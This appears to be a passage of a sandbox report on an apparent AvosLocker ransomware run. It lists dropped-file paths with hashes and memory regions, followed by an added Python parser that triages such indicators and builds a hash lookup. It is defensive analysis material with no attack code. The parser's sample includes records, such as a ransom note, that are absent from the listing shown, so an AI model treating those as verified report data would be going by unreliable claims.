SHA256 52381850f923e827ca05471779a2ad172d94bd912cc8c4e0e73adeb9ed238059
SHA512 630fc1f69a8e081618dc092453c138e442282774c5649789dd88b81d27a813f9415aceb57bfafe241e02dfa6521886b764d3878cd081363055dba81eea841a98

C:\Users\Admin\Downloads\e81a5d6a-3be4-427b-8adc-b1180e625877.tmp

MD5 8bb2f8ac4a8e38d2a757f24360c55e02
SHA1 58bc86303b547b068e213c77ef91f977883dd282
SHA256 a05825b22d78807ca5a6fdfcedaf326297d3102756fdaa58e9c0a52aab7091d2
SHA512 34bd5e72d9323a2c500dabd9e04071316cebea246edd204270770f5bc1415aaf778e5b0a512dd27d9d0b14a0eb00b82e80c4113e4f3d79e8c69be4de2aea8ce5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8b537675cb8b3901e0d8d59bffd2bcc5
SHA1 60050ecdaae2aedf395a5580ad11e7a21255d356
SHA256 94e8a60ef778bb34b1013abb1447ddc485ecd38ce391f84e363e174a349335e0
SHA512 165d8f4331e9f23b566160719c871fc79e5ac99e5616d3033da279adcc89c45a06f9fa8ae0f996297e76d7755af8a3c7b866d094e104b30618794e0ecd75ee0d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 b78c153b30c33ce30a1789a660563aa0
SHA1 058707a143202a6b926d20fcb4becb7e84dcd08c
SHA256 b1897ccb132c3cddf42f448080741b510a51e2efc626f9df63f23de82b946b03
SHA512 30fa3a253e6c563cee61645a1c06c20947abcb655d7f4b12c094cb11f016aa400b7b76da311fe02da1abe13b2a7bc397c9f3309384e7b3bc999c80d08916e036

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 a301d5ce30b31b13f743368f1617a848
SHA1 5e0d83eaf18bf4b970557e46a6d0fb11a5f87e34
SHA256 44528d23a3ec2c7873c6be35489b21ce261bcc62c7c9e3fc415428cdfbe6587d
SHA512 252369f3a678eaf0c41594e73cde7a6680d50d61fb8b36000377a808bd7700b837bf27120df85ab22e9735d3b4a74d42350eb0e2918d69e8b25b6db47e961c99

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c5abc082d9d9307e797b7e89a2f755f4
SHA1 54c442690a8727f1d3453b6452198d3ec4ec13df
SHA256 a055d69c6aba59e97e632d118b7960a5fdfbe35cfdfaa0de14f194fc6f874716
SHA512 ad765cddbf89472988de5356db5e0ee254ca3475491c6034fba1897c373702ab7cfa4bd21662ab862eebb48a757c3eb86b1f8ed58629751f71863822a59cd26c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\bfc43cb5-e005-4828-9f4b-76c4d320a891.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 a53b46f70611bead9a197fa096c03ff7
SHA1 7cdeea4c826e9715832761745c40e626e80a9dc4
SHA256 9e5a633255939b3c80064f33b4ab31727d8ebf796fa6dc3cf164192559886037
SHA512 622a3693ab28b0581d1968a93fa413b08602bfe4babcc26798725087047859fdf83c4791df2f0e88bdd335ebbdd3cde92f174b6181ccb258ec11138b79d12729

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

MD5 f70c0520fc35b85d5249a830eb6330c1
SHA1 a8fad550a642ddde7b791029c230ae337d4251b5
SHA256 b365ba905b7b3f2991de9358d30aa2a85144509077924b290d14727b01bdb061
SHA512 c5fe643b0e0b3c1ff5667ef38b325c341c932406ea81496590c6bef08a1a4bdb79fe9a83edd07d6691384d3fb5e9ce3074f4f3a1545a001b98d9f5fe33949535

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

MD5 30d982e828b5c524980da42245ee9e90
SHA1 7364e3f1f7ed95e2d772ec151b49b73e4972fee6
SHA256 c41244b589eae8e53d412f7da31782c1b6389dbef2d422a58971e5f32346adb0
SHA512 c40ad603cfae96e89e4b852dc29a0ddd8f8bd259c2b7acb4fdc2d9100d039a05b6624d533851a375267e8d4bc55aed0b079651129477bcba4b32cedbfe901100

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013

MD5 25714201a83fd63ea90a2e3f30d550c9
SHA1 64ff0abd6f35a873ae9713d5e5febe285a8deefb
SHA256 590419f13ad714dad9405f3764d603f28d61699f645b3fb0ed9923dcf301aece
SHA512 04d0fb0c1f0ecd78bef337d0f55bc74ce5e3c99c8a667a22786ed5060adf565b501dc096343005914e27e539591f6d4b978065422ccd6b3910aaa3d7ad6184e2

C:\Users\Admin\Downloads\UndoExport.pdf.avos

MD5 52a8a69a3250ef0dab7a485de4f6ea50
SHA1 19ba22c62213be3b366807ea24f76a9893ac8a0c
SHA256 689ff825e8c524971585af7bb9cdbaba2068d30350952f4ff743434ab95ff7b5
SHA512 8a504f71d0de93a7c6fe00eaa377abfdd28939a808b96bc14795f39a03a60897871d4f2039a339fce87aa5821b13f6e9a047f337cf1123678a0ad20241e1b1c4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8967d378c88f147a3efd5ca48db576ba
SHA1 0845eccf61071d85cfdd9247b77086eb8184d8d2
SHA256 080ee9a8f5f2ff89185a633b2a43d70e2518481baeb80d03d05d979cde5903e5
SHA512 c6f2b5113f994152b8a292e85cfeeee04af02a2abc6583bfd742cd403500e3c62eadeaf5fecbd1876b04018f99aff8e0ef584b5cc7d677504b7d89cc501cfcfc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fb02b5ac77293fc0242df1ed690b46a0
SHA1 d6cd279b5916e80e0ce9d6d9ec68b5f5da686fa6
SHA256 449ccec91d5bfc7df7bbb4a25648ac23a87b9b9ed077d3819df9cae313a667f7
SHA512 ffd8527e1a94d657b8ab469ac3314b93dc97692e07ced944764cc1fbfdc9f4f17d354bbd47217fae034b78e50f2bb6237ada57b700917c6fde9517ae3eca5db6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 aceb12359a183f2cb7d2b8d4ad21d6d3
SHA1 767d505dbe6e81ac758337ff6bb6a6b827d1b676
SHA256 bceb7ee52244c532f44ac7683d9595b49e401e69aade712f62571f57fc43139e
SHA512 74b1e4a8930f497038e9d1a999328c8707f4f3addf1db6929541d2be615ea12872dbe7bb47cc3867c64b60bc90ccb50362114f42b8d6bafc3b979d183ea9123c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 095510f2b20c0563510403ee38a1c558
SHA1 6a8fa9c8ff9959427fa158dc6e9fe774c6d2f7c4
SHA256 116700be14792fcd6339c4cfc769458cc5fda337f54ad42a026fb09973a46e98
SHA512 ca68e2c7f7d38a566e71a9be554c6016586fa14dd13bead7782031d41c0e46a482a5ad1607a4f271660be7d0a4fc5c06e6a30a1421c2ea9bebfe714b5a3e234d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1c793e4eeb1a7f9662832590b8b6c0d9
SHA1 48962473b1a66bbf1b596ee870ad14218b6b351c
SHA256 1519b5c4ada2311fd135e84bc413bdadeda5e85b57798c8769707fc648e2f33c
SHA512 e6d44a3a7afa71b843be8b2d052369368ddbdca5abe8cb32f0913020ca4e02a47175a005c9c8f2ee54d3453429c88bb2de2ef06cf80316c3baa5655df9ab283d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 2d95617d4e93354dfbb623e7b5e74a7c
SHA1 fb2cc4383adf95e714e437723ef2832166f5acaa
SHA256 c06d305b04259bbf2a4db39569420bd02a880f7862bc6ceb9341126f65c5154a
SHA512 9a8cf5d9c24581b50005751beee669c0dc974f623401b59a2d88f9ce5ab4fd5d565085220a1b909dd544c642a49994616c8b8d775d36aa4ab87faf0c8b03ca27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 02df7dc39affacdf89f785376816fe7a
SHA1 95e88dfb407b50232c0172b608f4906d6853060f
SHA256 2a939c7bf195b7311cf3b82cb83be4b2b976b594334c46267fb3871b1dbcf0c7
SHA512 ac2a8caca2bc8cffb10983dbb9f2a47c4a42cd7f7cf681a25538e6e8eabdfbf412e14584e8ba8500e15669a0c4114989a986e648f5037bfd420fd3bf4108e06e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000038

MD5 b05a4b509bc2599903f3ca63bcbc8ebc
SHA1 5709e2014ab82f8a6d460bfb8b3fc5d6488c4889
SHA256 9dd2fd33862e07b7f3024f97c2ed1fcc0607b44f6d4eee94966ab09d5ed6a68a
SHA512 7bfa3f4fdcdc1159176c9b40010c8122bfa8125f0519f77934bd12fbf26a984f5e5f7317ac8a3b4d8ed337e31acdd6a95e107338069b29be1bedffaa4410a4d9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c529100ce0d726db1e504921ac1c6b59
SHA1 8331130ff09d65c88ae53b7c20b3c755d12eab21
SHA256 cacdbd0f105232a78f275b44f1c986ab064f322e0504def32deea89c64623734
SHA512 b109f0f2fd08cd756548c0570fa32761cda6850f8e8a2ff8b6fdc311f7f7df7624d33a612fc82c21b21965eeffca1bad3d130453d51ab2427c3aba649eb80ac6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 afde25a5b7dd61ab1708615557a5e28a
SHA1 1f71926c04c6f22513b9691df8828b161b0c1443
SHA256 d873d9a8bbdedf5a53846835d5e4d9df1350baa43b82d7a00352850555b5a500
SHA512 87ea520f7d52790a516927fb0491657acf0f1829a9d5cb2d8018a60c968fd4c81bafe1c1e9974905e8c3c8758f1e730db5b9d4773e92d910a30ae08df987eb7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\f740a40196077810_0

MD5 39c725a30018c44113aa7a08124fe50b
SHA1 61294ae6d383d36b636970e97d66fc368445f465
SHA256 97c30bdd916b00e629a3e585a81e71960cf53c8b98e8a42f82ace1e2c608e3aa
SHA512 8548e982aa53c2f2957800559df104570d0f7eac61ea9b307d17223e43f8d6e21e89655d2d6ca00798f967dd26e91b1983547e0985f83e801342eaf224ffc118

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\c2e3859bc5f2969c_0

MD5 fd5de99a8ee0bb2fa5bf6fada7071946
SHA1 5c38e18fb94f521dcea4f5035a83b3d712f99c47
SHA256 cd26f504cc9d47540376069eb2427b417c9cc3d433422bcadd0e98e799d10b77
SHA512 4989d51ddab46a28bb6188e5671f1754b823177df4e0e557d28f83ca048755a0e7b7b05fe0a3670a269e1e212623a1fef62436be583d6ee44410cc3aa2d479fa

C:\Users\Admin\Downloads\af89aade-17d6-4ffd-8958-bebc0f0855b0.tmp

MD5 f45d8d3bf3a199077584c65424748936
SHA1 9d497ba0a69b75125f6d489aba44637856a1e84f
SHA256 fb91a7949e25b1081b3bc72a03337d2a2d7f865fe856e2cb0243ab6668f22b0f
SHA512 7d08906788535bacd5d89580521cec112f5c1c2e51ac61927f94d9fcc1006ffd21424a069f37860feb4c2cd543c40e16c0b5703637c1e60dc17bc77b54874441

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8696a540bf855862b3879dc2fdde2adc
SHA1 3df3ec76fc6b28626109b79bcde1a67a1cba6d4c
SHA256 34390e6f6a5ec47700d7260034d6b4ad4ff27f87b6d1ce52770f03ba718fd2bc
SHA512 84aef4f8d9fe1ffe614faccc690bccf15b83fbb685dcac87f86fbaf19c6fef13b1b7e569ecc67e864f828eecf2d9318fc1445716618191f01bba61af90587d37

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c62c553083980b1f3ffc1594b6ed62d3
SHA1 55582b0155862d25db328d44a5d49e3acf781302
SHA256 f7dfbed31834054f439828379586e33b754ef844b34f27d9b85da7350277dea8
SHA512 548a5f36b4974fdca022f520ddd6a0cd460c28b361a0718d3bece6f6db758905fff7bf65728e411d40ec92c2fcb06335be14f227678ce0348650efa7979e707f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 131054ae42ec95352c793189c11a7c25
SHA1 2b47906ee9c7ab6b30e8be73ab6a3f86de340826
SHA256 70686afa7d17cde77b987ca8c362fc24bd8729a6fa4cbf3c6441c64e564250ba
SHA512 6e6392b265d0acd49bdf7d45ddf3e0e8d00f68186c605179d5a82894b1fc1b206a88ef9ddc42640d523726e75dbacd71e78a706173e28ca5fc1555144e20c2ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 c9e13106c0df67f2dfd7422377a74a9f
SHA1 b97738c0030b1f73178f772bd471b3c257970b30
SHA256 9d4df24ef0019f683b114738196b0a19be76396a7950a7f962eda74a2c8cdc56
SHA512 66674fef7d577bc67d72e41d25485775cb0937dcfbe2644adf4b7de05a180d9de4116c5bf5b954ad2b8290e0b7050cc8999b65bb5f1b6c35b177d0f4318f7633

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 f41eb055bb4ff5d650717cfb6d0b9a0b
SHA1 0aeeca1cbde1fdebad8eaaf19cb6a76b71641927
SHA256 503c38cca2570e0e9d91985f9255d51de23a9060526f17f3ba3e5ddc0e817b77
SHA512 0740d2fa3b5e29780ad22c98e534209385f66451d248e10f6f2e6c13328e40b767983f03c1d2b3fc768939887be77eae61bea4402818570afb874f31f96b8598

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 f59d7ac1ecdad9e9b1ca12aa3deeac0d
SHA1 a75b30945e3a2d92c9fa1ed4cb66e613c2cd303a
SHA256 97c15ea73fe93c81846c1f43433e336b6f1cfd9a88168350b03f5b1b97ef5ecf
SHA512 45b845a3e981de0e2dfcdb81cf1c56ec1287b96092500cb2363e5e2c6b337a22025a421fcddcbbb384ae35ee908e21fdb702bf6da0aa7ea077a5b1b03dc173b6

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.cfg

MD5 904eaad00901f98cdf00b7c910139a7f
SHA1 9a49fa7da54f9372f5ecb287ae325d1f51b9c376
SHA256 1c1b57f22a38567a6f9b75086f703544d73bb6cafed06bdbcd9e4250cdb84e50
SHA512 63d701a4d7b7dcdc565ad42278f43339833b4ab71cbc93b53a90a6bd85fdb6e94b5caeba1549f076bd18f4041345e6c3e7847583ff27b8859555ae9d64b996e9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 efdf336c3d3a1adb92b2ad84b9e0ddf8
SHA1 d12684bf46d8efdc7fe65d72974a64f8cfc83aae
SHA256 a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc
SHA512 d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e

memory/244-3008-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3010-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3009-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3011-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3012-0x00007FF978F10000-0x00007FF978F20000-memory.dmp

memory/244-3013-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp

memory/244-3014-0x00007FF9765B0000-0x00007FF9765C0000-memory.dmp
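The listing above is a flat dump of dropped-file paths with their MD5/SHA1/SHA256/SHA512 digests, interleaved with process memory regions. As an added example (editor's code, not part of the sandbox report), the parser below reads that exact layout, validates digest lengths, and applies first-pass triage rules taken from the indicators on this page: AvosLocker's `.avos` extension and `GET_YOUR_FILES_BACK.txt` note, dropped executables under the user profile, the `__PSScriptPolicyTest_*.ps1` file that PowerShell itself writes when probing script policy (evidence PowerShell ran, not a payload), and Chrome/Edge profile churn that is noise. The label names and the rule ordering are the editor's assumptions; the embedded sample is a constructed subset of the records above, copied verbatim.

```python
"""Parse a sandbox report's dropped-file listing and triage it (added example).
Record format: Windows path, blank line, then MD5/SHA1/SHA256/SHA512 lines;
'memory/<pid>-<n>-<start>-<end>-memory.dmp' lines are memory regions."""
import re
from dataclasses import dataclass, field

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)  # algo -> lowercase hex digest

def parse_report(text):
    """Return (file records, [(pid, start, end), ...]) from the listing text."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append((int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)))
            current = None
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:  # catch truncated or garbled digests
                raise ValueError(f"{algo} digest of wrong length for {current.path}")
            current.hashes[algo] = digest
            continue
        current = FileRecord(line)  # any other non-empty line starts a record
        files.append(current)
    return files, regions

# Triage rules (editor's assumptions) derived from the indicators in this report.
EXEC_EXT = (".exe", ".dll", ".js", ".vbs", ".ps1", ".bat", ".cmd")
BROWSER_DIRS = (r"\google\chrome\user data", r"\microsoft\edge\user data")

def triage(rec):
    """Label one dropped file for an analyst's first pass."""
    p = rec.path.lower()
    name = p.rsplit("\\", 1)[-1]
    if name == "get_your_files_back.txt":
        return "ransom_note"
    if name.endswith(".avos"):
        return "encrypted_victim_file"
    if name.startswith("__psscriptpolicytest_"):  # PowerShell's own policy probe
        return "powershell_execution_artifact"
    if name.endswith(EXEC_EXT):
        return "dropped_executable"
    if any(d in p for d in BROWSER_DIRS):
        return "browser_profile_noise"
    return "other"

def sha256_index(records):
    """SHA256 -> path, for checking hashes from another host against this report."""
    return {r.hashes["SHA256"]: r.path for r in records if "SHA256" in r.hashes}

def lookup(index, digest):
    return index.get(digest.strip().lower())

# Constructed input: three records and one memory line copied from this report.
SAMPLE = r"""
C:\Recovery\GET_YOUR_FILES_BACK.txt

MD5 5f379e8e4834e0318a4d32cc0694c25e
SHA1 46a05816fa412f576c695f33e1c876287e2cc939
SHA256 daafd23150d97b38e7478711b69934e662d532083ba10392b5329c4829330eb5
SHA512 23873cebede58ae7264f07634f1131a40a0766e5b65a138e0bc0d2141f5929b89c158b251c1215f08d06caf8c7f20b7a575d32855c0a30a8c201f09e756ebaa8

C:\Users\Admin\Downloads\UndoExport.pdf.avos

MD5 52a8a69a3250ef0dab7a485de4f6ea50
SHA1 19ba22c62213be3b366807ea24f76a9893ac8a0c
SHA256 689ff825e8c524971585af7bb9cdbaba2068d30350952f4ff743434ab95ff7b5
SHA512 8a504f71d0de93a7c6fe00eaa377abfdd28939a808b96bc14795f39a03a60897871d4f2039a339fce87aa5821b13f6e9a047f337cf1123678a0ad20241e1b1c4

C:\Users\Admin\Downloads\advancedrun-x64\AdvancedRun.exe

MD5 3f44dd7f287da4a9a1be82e5178b7dc8
SHA1 996fcf7b6c0a5ed217a46b013c067e0c1fe3eba9
SHA256 e8000766c215b2df493c0aa0d8fa29fae04b1d0730ad1e7d7626484dc9d7b225
SHA512 1d6b602bf9b3680d14c3c18d69c2ac446ad2c204fca23da6300b250a2907e24cf14604dc7d6c2649422071169de71d9fc47308bfbbb7304b87d8d238aa419d03

memory/748-1297-0x00000249DBB30000-0x00000249DBBB6000-memory.dmp
"""

def triage_sample():
    files, regions = parse_report(SAMPLE)
    return {triage(r): r.path for r in files}, regions

if __name__ == "__main__":
    labels, regions = triage_sample()
    for label, path in labels.items():
        print(f"{label:30} {path}")
    for pid, start, end in regions:
        print(f"pid {pid}: {end - start:#x} bytes at {start:#x}")
```

Feeding the whole Files section through `parse_report` and grouping by `triage` label separates the handful of actionable artifacts (note, encrypted files, dropped binaries) from the dozens of browser-profile writes, and `sha256_index` turns the listing into a lookup table so hashes collected from a suspect host can be checked against this detonation without re-reading the page.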